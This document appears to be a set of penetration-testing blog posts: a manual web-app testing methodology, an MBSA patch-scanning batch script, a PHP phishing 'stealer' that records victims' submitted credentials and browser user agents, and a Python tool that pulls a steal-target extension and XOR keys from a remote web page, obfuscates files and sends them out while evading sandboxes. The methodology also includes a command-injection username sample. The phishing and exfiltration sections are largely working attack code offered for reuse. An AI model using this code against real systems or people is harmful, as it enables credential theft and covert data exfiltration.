Web App Testing via Interrogation – Q&A not QA

You’ve setup your Burp proxy, you walked through the application, ran some spidering, setup your session configurations, now the scanning begins rockstar, lets see all those vulns. Stop. Let the scanner do its work. Now it’s time to do yours and thoroughly enjoy it. Clear cache and cookies. Make a new user. Spin up a new Burp instance if need be. Savor this moment of simplicity. Tell yourself you’ll only look at the scan results to validate that the scan is running without error. You’ll have time to validate all those red blinking things later.

It all begins with a question?

Yes. Penetration testing is nothing more than a series of questions and answers. We have automated questions, questions that get answered and parsed into pretty interfaces, not so pretty interfaces and everywhere in between. There are questions that we ask our clients about the engagement, questions we ask them about the scope, questions that we ask ourselves before testing. The most important questions during the test window though are the questions to the application itself. You could ask the devs, sure that might work if they had time to respond to your every inquiry/knew what would happen in the first place – I don’t mean to say this isn’t helpful to talk to devs to get more insight though. Most of your questions you should be asking are to the application itself. That may sound absurd. Why would you ask your human formulated questions to an application? Because you’ll begin to see the test for what it really is: A Q&A session between you, your tools, your caffeine intake, and your target.

When you’re asking questions to your target application it’s best to start off simple so you’re not immediately bogged down in details. What is your purpose? Who uses you? What’s this button do (non-technically)? Simply walk through the application and ask your application these questions in the form of GET/POST requests. Go to the sitemap, go to the help page, give it a skim. Go get the answers to the questions you formulate in the responses you see and just be childishly curious. No need to write any of these questions or answers down – no one is a fan of overhead just keep them in the head. Then we ask the really obvious ones everyone asks but are tantamount in importance: What’s stored on this site that’s valuable to an attacker? Passwords? CC numbers? Personally identifiable information? Proprietary information? The client’s reputation? More times than not it’s a combination of most if not all of those – and yes their site source code is probably considered 40% proprietary and 60% Stackoverflow (rough estimate).

Then we get out notepad (or vim or nano or notepad++, or cat >> ./notes, whatever). Now it’s time to record questions that really do need solid answers if it’s possible to obtain them.

What webserver is this? Does it switch at all for certain pages/domains? What OS is this webserver running under? Does it switch at all for certain pages/domains? What is the backend database? What framework are they using? (ignore versions for now, more on that later) Where are they getting/sending their data from/to (external/internal sources) and how? Ok, drop the pen. Save it somewhere and fill it out as you go now. Let’s get back into the pure wetware.

How did you do that and why?

This is often the simplest question to formulate and one of the most difficult to answer which is also makes it one of the most valuable. How did you send that email to my inbox when I told you I forgot my password? Let’s check our inbox. Let’s check our mail headers. Did they really just send my cleartext password over email? Why did you have it in cleartext? YOU HAD IT IN CLEARTEXT?? YOU SENT IT OVER SOME RANDOM RELAY YOU DON’T OWN? Damn you. How did you make that nonce token? Are you using some algorithm that’s factoring in time for it? Why is it that when I request 30 password resets in quick succession that their values are very close if not sometimes identical? How did you verify that I had that many credits on my account? How did you just add that credit? Why does the page restrict me from going back? Does it not want me to hit page 2 again? Why did you think that javascript was going to force me to not put a minus sign or a “ ‘ “ in that input box? How did you verify that the two values were the same through that series of POST requests you called a transfer? Why is that strange base64 “encrypted” value stuck at the end of that URL now?

These are just disorganized sample questions – what’s really valuable here is being observant to every parameter and process in every request and noticing change. Notice the small things – don’t be afraid to diff those two seemingly similar looking randomized strings. But when you might see they’re similar but not the same just ask why or how or even better: both. The other part of how is formulating how you might implement it. I don’t mean code it out. Just think for a second how you’d handle a small subset of the logic of the application and focus on it. What would you do to get from A to B. This is where being somewhat of a developer pays off. It will allow you to tap into a reservoir of assumptions the programmer might have made – because your way may have been the correct way. You test to see if your implementations differ and how they differ then perhaps why they do.

A simple real world example observed on a prior engagement: You begin testing a series of 3 POST requests used in the ‘forgot password’ functionality. The first page itself accepts a username. The second the security questions for that user (yes you already see that it’s user enumeration and security question enumeration). And finally the third page resets the password by asking the user to enter in the new password twice to confirm. No emails are sent, by design it’s actually terrible. So lets break it with questions. First you ask how is it confirming my security questions? That’s fairly simple. You test other questions like: is it case sensitive? What happens when I omit the security questions POST’ing to that page and what happens when I try to cause the application to fail by assigning the POST parameter as an array instead of a single string (fail open: ex – answer[]=catchme). Is it ratelimiting? Or is it requiring a strong CAPTCHA to enter in the security questions to prevent bruteforce? None of this seems to do anything really useful. Failures always redirect back to the security question page with an error stating the answer was incorrect. Well that’s unfortunate. But I’m not done interrogating it. So how is this thing working? First page’s POST posts to itself as do the others. The response when its successful is a redirection to the next page. And the security question page follows similarly. How does the next page know what you entered in the last page? It must be something I’m sending.. namely the cookie and therefore the session. So you test this theory by requesting the questions page itself without cookies. It redirects you to the page that asks for the username. You re-insert the cookie to the same request and observe it asks you for the security questions. Confirmed! Then you begin to wonder what other values are tied to the session, and it hits you: what if the set new password page never checks that I actually entered in the correct security question’s answer and instead only checks the username? You enter in the username into the first POST request, copy the cookie and POST to the third. Violla. A success page indicates you have successfully changed the password. Ouch.

Where are you?

Have you ever noticed your scanner missed a very simple parameter because it simply couldn’t understand the format? Have you ever seen an application scanner waste precious time grinding up against a page that you knew wasn’t going to actually process because it required prior steps to associate the session to the actual logic of what was getting sent to the backend? I have, it’s annoying – sometimes annoying enough to write extensions, but for the most part it’s more beneficial to identify that input or series of inputs and throw it through your own battery of tests either with those machine hands of yours or Burp intruder if you’re into that whole brevity thing.

Let’s talk about delimiters. What are they if not just parameters within parameters? A scanner will treat one GET/POST/cookie/JSON/XML element parameter as a single parameter. But you’re smarter than a scanner. Sometimes it’s beneficial to go look through the parameters and spot delimiters because likely the scanner will have just appended a payload but you! You can put any payload anywhere you please.

So go find the delimiters in this and count the possible parameters, I’ll wait:

parameters

Got a number? I didn’t count either. But if you did it’s a good exercise! I’m not pentesting it so I don’t have the time but you might be! It’s important to prioritize and always keep mind of the time afterall (see conclusion). Break down The obvious ones (thanks Burp):

parameters_highlight

But what about…

parameters_highlight_other

These parameters too need love too. Yes I missed a few. The ‘nt’ parameter it should be fairly obvious where we want to break into: likeliest will be those number values themselves perhaps even the parameter names if they cause a nice exception or an interesting stack trace. Now that ‘tl’ parameter has me curious.. how many parts can I break that up into?

parameters_highlight_broken

Always URL decode, even for hex ninjas it’s easier on the eyes. So these are relatively mundane looking but they serve an illustrative purpose. You have to ask exactly where the inputs are to the logic of the application. Just because some filters are applied to one part of the parameter doesn’t necessarily mean the other part of the parameter will have that filter. Basically what this is getting at is it’s just as important to find where as it is how. Content and input discovery are crucial to give you more attack surface. Don’t overlook trivial things.

Some tips to speed things up:

hotkeys

Hot keys – learn to love them. Any decent RTS player will tell you they aren’t simply a convenience they are a necessity! Try to bind them in such a way so that your left hand can do them easily by itself because it’s likely your right hand will be busy with either the mouse or a coffee mug. They will speed up these repetitive pokes considerably and you’ll be more likely to perform them if they are easier – human nature.

Where do you see yourself in 5 pages?

What’s getting stored in the data structures associated with your session that you control like the sample in the example in the first session or even other user’s session? This doesn’t just apply to finding stored XSS. This is another part of identifying inputs but it’s inputs into the data layer and not simply the first page. How does one parameter carry to other pages and what is reflected back. If it is reflected back is it encoded differently or filtered differently? This may be an indication that they’re sanitizing output on some pages but not performing proper input filtering. Scanners have a very difficult time observing these types of bugs because they’re mostly just focused on the response of the immediate request. Every single input that gets transmitted to another user, sent over email, posted to another site, or used in other components of the system that should be carefully scrutinized and you’ll quickly realize how many objects this actually is. For every input that you believe will be transmitted just ask where is it going? How is it getting there? Then you get into the myriad of “what if’s”. What if I set my username to me%0aping%20-c%201%20mysite.com%0a when I know they were setting up some limited shell service for me? What if I encoded my username in such a way that it would be equivalent to another user’s account in the authentication component without actually triggering the duplicate user error in the sign up page’s check through a Unicode trick? Where is this data going? The interactions of different components and their technologies sometimes brings forth the nastiest and most lethal of vulnerabilities.

What more can you tell me?

Are you a cat or a mouse? Sometimes you get verbose headers that tell you nearly everything you want to know about a webserver type and its version number and/or the tech stack being used. This is fantastic. You’ve already filled out those questions. But there is more, code re-use is extremely prevalent and not all programmers actually monitor security feeds to spot new CVEs. What if the server is tell you next to nothing about the webserver or frameworks in use in its headers? Tools like httprint are useful but sometimes it’s nice to just do the job manually to determine a webserver or webserver version. Frameworks and libraries used can also be identified. There are so many ways of doing this, this section wont be exhaustive but hopefully it’ll get you on the right track.

There are simple simple ways of identifying a framework based on the parameter names it uses. The most obvious being something like VIEWSTATE which would likely be ASP.NET or JSESSION which would likely be Java and Tomcat. Googling cookie names and parameter names will give you very interesting things to look into. For instance, Apache can be easily identified by requesting /server-status or /status to see a 403 forbidden or a similar non 404 error message. For IIS, I typically check for /trace.axd. For Apache version identification I sometimes poke at individual CVE’s I know are easy to throw like: CVE-2012-0053 – which will narrow it down to 2.2.x through 2.2.21 and give you another finding. These will give some detailed error messages that may help. Any time you see error messages, it’s highly advisable to just copy them put them in quotes and google them as they will likely be in Stackoverflow explaining an existing bug and will help you narrow down the libraries, frameworks, or webservers in use and their associated versions. Sometimes error strings also change from version to version: checkout the SVN or Github of that project and see when the change was made – you now have a ballpark of ranges of versions if you can narrow down when a particular item was changed. To query languages or frameworks in use it’s often necessary to delve a little deeper into the behavior of certain applications. Some apps will accept ‘answers[]=this’ very simply and not complain, PHP on the other hand will shit itself complaining that the parameter is not of type string or a similar error. It’s extremely important here to fuzz parameters and try to get as many error messages or anomalies as possible. I like fuzzdb but you’ll do well to add to the list of payloads and techniques to identify peculiarities. This is the magic sauce, it can be taught but it’s much more pleasurable and beneficial to gain these over time with lots of tinkering and questions.

The overall question is: What combination of 3rd party libraries/frameworks makes up this application? Go through your request log in the target tab, look for seemingly unique names in URLs like /js/dojo/something.js. Go take a look and then ask the application: how often have you been updated? Check the CVEs against that library and download the library itself. Look for the file structure of the deployment and look for things that might be left behind in those directories: files like VERSION, README, configuration files and the like are especially handy to identify information disclosures. This information in turn can be used to ask further questions about backport patches, what did the devs change from version X to Y in association to this CVE and where can I confirm the vulnerability. You might find default test pages with XSS, debug output from something the developers forgot to delete or even new bugs in the libraries they’re using. The advantage of a lot of open source 3rd party libraries is that you actually have the source code to go confirm some things, and if time permits (or if attack surface is limited to justify some deep dive) research new vulnerabilities in the 3rd party library/framework. Your clients will be thrilled and its also deeply satisfying – particularly googling ‘inurl:’ statements to see how many systems your 0day just popped and giggling like a school girl as you go informing the vendor(s).

Eventually you should get better and better and identifying strings that are unique which make for great google searches. Just keep asking the questions about what is being used and be relentless in your interrogation.

Now what aren’t you telling me?

The little lies in an application that you may notice either with great thought and further probes or even immediately are called assumptions. Do you assume I will go to page X, Y, then Z? What if I went directly to Y first? What about if I went to X established some session variable then went to Z? What if you actually weren’t checking that CSRF token value? What if I omitted it completely? Here is where you simply exhaust attack options. You’ve identified key components, the hows of important things like authentication and parts of session management, maybe you understand a decent portion of their interactions but it’s closing time. Start asking “what if’s” like it’s simply going out of style. The questions you asked the application beforehand might give you some insight about to what to ask next for each particular component you’re checking. Omission is an input in of itself in a way.

Sometimes a little automation is in order, brutally assault the app then ask more questions if abnormalities appear:

intuder

(using Burp Intruder to exhaustively go through %00-%ff and observe responses – use hex digit bruteforcer, extracting error code from a page with the ‘grep extract’ feature)

Simple questions such as “what types of characters will this app accept and how does it return them to me afterwards?” can lead to very interesting results if you know where to look for the error code. Often times it’s as simple as content length differences from the norm, occasionally you’ll get error messages. When the app tells you an error message you Google that string in quotes and then you’ve likely answered another question – what exactly are they using and how can I exploit it? I admit a strong reliance on Burp’s toolset. I can’t stress the need to learn Burp Intruder inside and out. It’s a fantastic tool. Learn to sort the responses to your fuzzing, learn to develop your own payloads and learn to grep extract. Response content length is a huge indicator but things like ‘response time’ columns are also just as useful in identifying potential weaknesses. Interrogating through Intruder is that blend between automation and manual tinkering that I find some of the most interesting answers to my questions. Alternatively you can script a lot of these tests that require automation, I find that given the number of test cases against the number of inputs I’m against, it’s often better to hand the automation off to Burp instead of writing up some spaghetti perl/python for each particular situation. Another final tip is _session management : this can be done in Options->Session handling rules. Burp can augment existing tools (proxy through burp and set scope to proxy), make intruder and the scanner more reliable, and overall do some crazy things. More information can be found at http://portswigger.net/burp/help/options_sessions_ruleeditor.html

Conclusion

Be curious, ask questions, google things, poke things, watch things blow up. The real crux and bane to every webapp pentester’s existence though is time. It’s absolutely crucial to keep into consideration the grand picture of things. If you have one day left and your scanner tab has been blinking red the entire time you’ve been doing manual testing? It’s time to put down the manual poking and begin validating/triaging potentially excellent findings. I know I really strayed away from scanner and forbade the use of it but that was more of a point to put the real focus on the manual questioning not the automated ones. Automated scans can be extremely useful to provide more coverage, and its output can often feed back into your existing manual tests and even give you information to answer some of your questions. Hopefully that’s in the form of SQL error messages and the like.

Blue Teaming/Audit scripts

I love doing “Red Teaming” stuff, but every once in awhile a customer will ask us to perform a “Blue Team” assessment in order to help them gear up for a compliance audit. For example, I did a lot of work for Energy/Utility Companies, most of that work was helping them prepare for their NERC audits. Part of this assessment was tracking down assets and finding out information. Some of these assets were PLC, HMI, Modems, etc. and other “non-traditional” devices, but for the most part there were a lot of Windows or Linux systems. For the Windows side, we had a few scripts that would gather User information, Security policies, Patch Information and other stuff. This made life easier, because we had a thumb drive that would autoload (if allowed) our batch script and gather this information in a matter of minutes. Anyway, a part of that assessment was to identify missing patches. If you are familiar with MS products, they have the Microsoft Baseline Security Analyzer (MBSA) which will gather information about missing patches and other stuff.

For this post, we will concentrate on patches. The great thing about this tool is that it has a CLI client that is added during installation. This client can be easily copied and is small enough to fit on a small to medium sized thumb drive. This client works with the Windows Update Agent (WUA). You will have to download the latest offline “.cab” file from MS. Once that is done, you can use the MBSA client to scan remote or local computers.

In this example we will be scanning a local computer. I have made a batch script to perform this.


@echo OFF echo
=== Gathering information for %COMPUTERNAME% ===
mkdir %COMPUTERNAME%
mbsacli.exe /nvc /xmlout /wi /unicode /catalog "%CD%\wsusscn2.cab" > %COMPUTERNAME%/%COMPUTERNAME%_MBSA.xml

You can easily add other things to script, but for now I will keep it basic;you can find a list of commands here. This script will make a directory, run the client and then save the output “computername.xml”.
/nvc: To avoid checking for a new version of MBSA
/wi: Permit to display all updates
/xmlout = create xml output
/unicode = used for formatting output
/catalog= telling the script to use the “.cab” file. Must specify path of cab file.

To display the full list of options use the “/?” command.

What isn’t here, is the “/listfile” command, which will take a list of servers by NetBIOS name or FQDN name and scan them. You must also specify the path of the “servers2scanlist.txt”. You can also scan a range of IP addresses with “/r”.

Note: you must have the “Wusscan.dll” in the same directory or it will not run. Also, you must be an administrator, or specify an admin user “/u” and “/p” options.

Now that we have everything in the same directory, we can start.

(1). Run the script by “double clicking”

batmsb

(2). As you can see it creates the localComputerName directory and inside that directory is the MBSA XML file.
dir

Now if we view the file, we see all the patches for this local computer.
xmloutput

It looks like a blob of nothing, so I created a simple python file to list whether patches are “Installed or Not Installed”. parsebasic

In this case, I am more interested in patches that aren’t installed. This outputs by BulletinID, Severity, and Title. You can easily add in reference links and other information.
notinstalled

Ok, simple enough.

The possible evilness of this: As I said before you can easily script this scan a range. For example, say you are on a “Red Team” test and you have gathered some form of Administrative credentials, your next step would be to move laterally and work your way up to a DC and file shares. That is good, but I have known some companies to block the use of “psexec” for certain users. Of course there are other ways to move laterally besides that. But my point is, now you can use this on/from a compromised computer; or if you are on an internal test, run it from your machine. It will help you take some of the guess work out of finding your next target and seeing what they are vulnerable to. It will be noisy, however, if they have normal vulnerability scanning traffic going on it may blend right into that noise. The next steps would be to write this in PS and also update my python script to search for specific patches, display prettier format or even save to CSV or HTML. As always, files can be found on my github.

Merry Christmas!!

Let’s Go Phishing!

So, I was chatting with a co-worker about ways to track certain things while on a phishing engagement. One of the things the customer wanted to track was browser versions. Of course, this is a great way to see if patching is lacking and if users are using a non-standard browser. There are tons of ways, and things, we can track from User Agent strings, creds, hostname/ip and so on. You can use PHP, JavaScript(JS), ASP.NET or what ever. After searching around in my old scripts, I remember that there was an easy way to track things with PHP. So I wanted to share how you can use this during a phishing campaign.

Setup First, in order to test our “stealer” script, we have to setup our environment. Because I am lazy, I will not make our phishing site look “legit”. This blog post is more of a ” you can start here and expand” type of thing. Anyway, if you want to go all crazy and create a “real” looking site and DB, you can. However, I did a simple login page and DB setup.

Host: CentOS 5, PHP5.1, MYSQL 5

Note: I am running older versions of stuff because of other testing. Therefore, some functionality may have changed in later versions. I know in PHP >=5.3, there are more commands to gather info on the victims visiting your page.

Before we begin, you have to setup your database. You can easily do this by installing MYSQL.

(1). Create your database. I create a database called “webdb”

mysql> create database webdb;

(2). Create a table. I created a “users” table with three parts (ID,username,password).

mysql> CREATE TABLE users (ID MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, username VARCHAR(60), password VARCHAR(60))

(3). Create a user to control the webdb database.

mysql> create user 'webdbuser'@'localhost' identified by 'strongpassword';

or you can set the password this way.

mysql> set password for 'webdbuser'@'localhost'= PASSWORD('strongpassword');

(4). Give privs on the “webdb” DB to the user you created.

mysql> GRANT ALL on webdb TO 'webdbuser'@'localhost';

(5). Start to add users to your database

mysql> insert into users(ID,username,password) -> values(5,'tony',PASSWORD('ironman'));
Query OK, 1 row affected (0.14 sec)

Obviously, you will start at 1 and work your way up. Once that is completed it should look something like this.

mysql> select * from users;
+----+----------+------------------+
| ID | username   | password      |
+----+----------+------------------+
|  1 | bruce      | 171f5d1d71f84332  |
|  2 | clark      | 6f12b8fd4d9f0334  |
|  3 | peter      | 0a901b8559f60af9  |
|  4 | oliver     | 3b38eb7a071dab70  |
|  5 | tony       | 6e5fec7a1590c258  |
+----+----------+------------------+
5 rows in set (0.00 sec)

Ok, now for the PHP setup. I will post all of this on my github. I have created a little front-end for our DB. It verifies that the user is in the DB and has the correct password. If they do, they are forwarded to the “Login_sucess.php” page, if the creds are entered in wrong, they are forwarded to the failure page. Our phish site has 3 parts:

(1). Main “index.php” page This page is a simple form. I have added the following line to sent the creds to the “check login” page is used:


form name="form1" method="post" action="check_login.php"

mainlogin

(2). Success success

(3). Failure fail

The page we are concentrating on is the “Check Login”. This page contains creds to connect to our database and perform the query that will verify the users. It also is where we have our “stealer” script. The script is only a couple of lines, but does the job quick and easy.

header("location:login_success.php"); // forwards us to this page if user enters correct info
$credfile ="creds.txt"; // file to create and hold our stolen info
$handle = fopen($credfile, "a+"); // appends to file or creates if not there
foreach($\_POST as $variable => $value) { // takes our variables that we post (username/password)
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n"); }
fwrite($handle, "\r");
fwrite($handle,"UserAgent");
fwrite($handle,"=");
fwrite($handle,$\_SERVER['HTTP_USER_AGENT']); // User Agent
fwrite($handle, "\r\n\r\n");
fclose($handle); exit; }
else { header("location:login_failure.php"); //fowards if user enters incorrect info
$credfile ="creds.txt";
$handle = fopen($credfile, "a+");
foreach($\_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n"); }
fwrite($handle, "\r");
fwrite($handle,"UserAgent");
fwrite($handle,"=");
fwrite($handle,$\_SERVER['HTTP_USER_AGENT']);
fwrite($handle, "\r\n\r\n");
fclose($handle); exit; } ?>

Nothing super elite, but it does the job. Note: depending on your setup, you may run into a few issues. If your web directory is not controlled by your web user, then you will not be able to write/create the cred file. In my case, I have the “Apache” user in the “Apache” group. You can create a special place where you want to log the data and chown that directory. Or if this is in a test environment, who gives a poo: chown apache:apache /var/www/

When everything is done and a user has visited your site:


[root@localhost www]# cat creds.txt
usrname=bruce
passwd=batman
Submit=Login
UserAgent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121911 CentOS/3.0.5-1.el5.centos Firefox/3.0.5

From here, you can do all sorts of things, using JS, Jquery, etc. If you wanted to serve up different exploits matching on user agent, you can do that. Or if you want to use JS, which is not a bad way of doing it, just assign a variable since JS is client-side to forward that info.

Not my code. I believe I got it from stackoverflow or somewhere, so credit to whoever. It does the job well. This basically matches Browser version using the JS navigator object. Should match all the way up to IE11 as well as other browser types.


< Continue reading Let’s Go Phishing!

Rollin with XOR

XOR’ing malicious binaries has always been a malware staple, but I decided to use it on my data that was being ex-filtrated to try to make the lives of anyone on the defensive side harder. (note: this was for penetration testing purposes)

The obvious downside to having the routine built into the binary is that static analysis will usually cough up the XOR key. If I am generating the key at run time using an algorithm built into the binary then the key would be coughed up using dynamic analysis. What to do…

I decided that I would host a key on a website as an inject in a xml comment tag, and then use a script that changed the key every X seconds. Not exactly inventing the wheel, but effective nonetheless. Well, finding a XOR key isn’t hard using a variety of tools such as those by Didier, so I decided to up the annoying factor by doing a random number of XOR’s in succession that are generated randomly on a remote server every X seconds. Ta Da, we have a pain in the ass. The “obvious” way to find the key is to have full packet capture on your network and reconstruct the pcaps, find the string that was pulled and decode. Doing that in practice is harder. What if the binary calls out to five or six domains and the string it pulls is hidden deep in the code? PITA. If the binary is run in a sandbox it won’t do the final sendoff of the data if it can’t pull down the code, and if you run it after the fact to duplicate the scenario the XOR codes will be different, and the extension of what was stolen will be likely changed as well to throw off reconstruction of the data loss.

The codes are injected into php files which are then included into the main index page with the following simple code.
[js]


[/js]

Seemed the easiest way to do things.. It’s all written in python and with the excellent pyInstaller a Win32 working binary is just seconds away.

The injector also writes the decoding instructions along with a time stamp to a log file server side so that when you get your ex-filtrated garbage you can un-encrypt the file by looking up the correct code via the time stamp.
Here is an example log file…
[js]
201310101726: Decode via XOR’ing: [‘0x46’, ‘0x79’, ‘0x85’, ‘0x80’]
201310101731: Decode via XOR’ing: [‘0x15’, ‘0x68’, ‘0x39’, ‘0x89’]
201310101736: Decode via XOR’ing: [‘0x96’, ‘0x99’]
201310101741: Decode via XOR’ing: [‘0x53’, ‘0x65’]
201310101746: Decode via XOR’ing: [‘0x57’, ‘0x55’, ‘0x31’, ‘0x54’]
201310101751: Decode via XOR’ing: [‘0x48’, ‘0x55’]
201310101756: Decode via XOR’ing: [‘0x68’, ‘0x87’, ‘0x98’, ‘0x19’, ‘0x28’]
201310101801: Decode via XOR’ing: [‘0x51’, ‘0x55’, ‘0x23’, ‘0x17’]
201310101806: Decode via XOR’ing: [‘0x36’, ‘0x77’, ‘0x01’, ‘0x26’, ‘0x76’]
201310101811: Decode via XOR’ing: [‘0x74’, ‘0x83’]
201310101816: Decode via XOR’ing: [‘0x03’, ‘0x24’]
201310101821: Decode via XOR’ing: [‘0x15’, ‘0x34’, ‘0x05’, ‘0x90’, ‘0x61’]
201310101826: Decode via XOR’ing: [‘0x82’, ‘0x85’, ‘0x26’, ‘0x21’, ‘0x92’]
201310101831: Decode via XOR’ing: [‘0x71’, ‘0x85’]
201310101836: Decode via XOR’ing: [‘0x57’, ‘0x36’, ‘0x62’, ‘0x51’, ‘0x27’]
201310101841: Decode via XOR’ing: [‘0x86’, ‘0x36’, ‘0x60’, ‘0x60’, ‘0x06’]
201310101846: Decode via XOR’ing: [‘0x64’, ‘0x17’, ‘0x95’]
201310101851: Decode via XOR’ing: [‘0x33’, ‘0x26’]
[/js]

Here is the code for the injector which writes the code into a php file which is included on a website. I also did some simple obfuscation of the filetype to steal for the code by base64 encoding it and injecting it onto the website between tags. The injector function creates a random string anywhere between 6 to 12 chars long which correlates to 3 to 6 XOR’s in a row. If you want to be a real thorn, go 6 to 12 or whatever suits you.

grab1

The binary itself uses some standard libraries such as urllib2 to grab the webpage and then use regex to get the unique XOR code and the extension to steal between two tags (UID for XOR code,DIU for extension).

grab1

Then once the XOR code and file extension dictating what will be ex-filtrated is pulled into the binary the appropriate number of XOR encryptions are made and the file is then sent out. In my personal case I used ftp since I was trying to help the good guys and not be too sneaky. If a garbled file being sent to a remote ftp server doesn’t trigger your network sensors you may want to re-evaluate things.

grab2

Functions in the injector to be hosted on your apache server with /var/www being your working web directory…

Code for copying and pasting. Side note, is there a sublimetext looking code plugin for wordpress?? Anyone?
[js]
def stealtype():
ext = raw_input(“What type of file do you want to steal?:”)
ext = base64.b64encode(ext)
webfile = open(‘/var/www/stealtype.php’,”w”)
webfile.write(ext)
webfile.close()

def injector():
while True:
#randomly encoding 3 to 6 times in a row
numdig = randrange (6,12,2)
digits = ‘0123456789’
randomstring = ”
for x in range(0,numdig):
num = random.choice(digits)
randomstring += num

#write code to injector file which is included on locally hosted webpage
webfile = open(‘/var/www/injectcode.php’,”w”)
webfile.write(randomstring)
webfile.close()

#create decode directions stored in logfile.txt along with UID to ref
numxors = numdig / 2
n = 2
xorcodes = [randomstring[i:i+n] for i in range(0,len(randomstring),n)]

for x in range(0 , numxors ):
xorcodes[x] = ‘0x’+xorcodes[x]

#flip order for unecryption directions
# since A(x)=>B(x)=>C(x) = D then reversing to plaintext…. A = D(x) => C(x) = B(x)
# where x is the unique XOR for each level of pseudo encryption
xorunencode = xorcodes[::-1]
xorunencode = str(xorunencode)

# make logfile with timestamp and code so you can correlate and decode
trampstamp = strftime(“%Y%m%d%H%M”, gmtime())
trampstampwithcode = trampstamp+”: Decode via XOR’ing: “+xorunencode+”\r”

logfile = open(“logfile.txt”,”a+b”)
logfile.write(trampstampwithcode)
logfile.close()
print “writing code: %s to /var/www/inject.php” %(randomstring)
time.sleep(300)

if False :
break
[/js]

Functions to do the grab and the XOR in the script to become your binary. Don’t forget your import’s!
[js]
codeaddy = ‘yer address’

def extensiongrab():
html_content = urllib2.urlopen(codeaddy).read()
ext=”
ext = re.findall(‘“?\’?([^”\’]*)’, html_content);
ext = str(ext)
ext = base64.b64decode(ext)
print “extension decoded as: %s” %(ext)

if len(ext) != 0:
return ext
else:
ext = ‘.log’
return ext

def codegrab():
#add in error handling so that if the website isn’t found it exits and
#cleans up quietly

html_content = urllib2.urlopen(codeaddy).read()
matches = re.findall(‘“?\’?([^”\’]*)’, html_content);

if len(matches) != 0:
return matches
else:
os.remove(ziptimestamp)
sys.exit()
[/js]

In this example the ziptimestamp is the binary file to encode. The for loop is XOR’ing each bit of the binary file, and then doing the next XOR code until it reaches up to 6 XOR’s as dictated by the creation of a string 6 to 12 keys long. Example, 012456 becomes 0x01 0x24 0x56 or 3 XOR codes applied in order. YES, I could up the randomness by using the full HEX values A–>F, but I was running into type issues when converting to base16 for the XOR encoding so I just left it 0–>9…. So if the mal binary pulled that code and sent it off to you, to un-encode you would apply the code in reverse order: 0x56 –> 0x24 –> 0x01 and then you would have your plain text files of whatever type you dictated.
[js]
def crypt(matches,ziptimestamp):
randomstring = ”.join(matches)
numxors = len(randomstring) / 2
n = 2
xorcodes = [randomstring[i:i+n] for i in range(0,len(randomstring),n)]

for x in range(0 , numxors ):
xorcodes[x] = ‘0x’+xorcodes[x]
#print xorcodes[x]
b = bytearray(open(ziptimestamp, ‘rb’).read())
for i in range(len(b)):
dacode = long(xorcodes[x],16)
b[i] ^= dacode
open(ziptimestamp, ‘wb’).write(b)
[/js]

Send me an email if you have any comments or want more of the actual code that performed the exfill. ~ keyzer at s0ze . com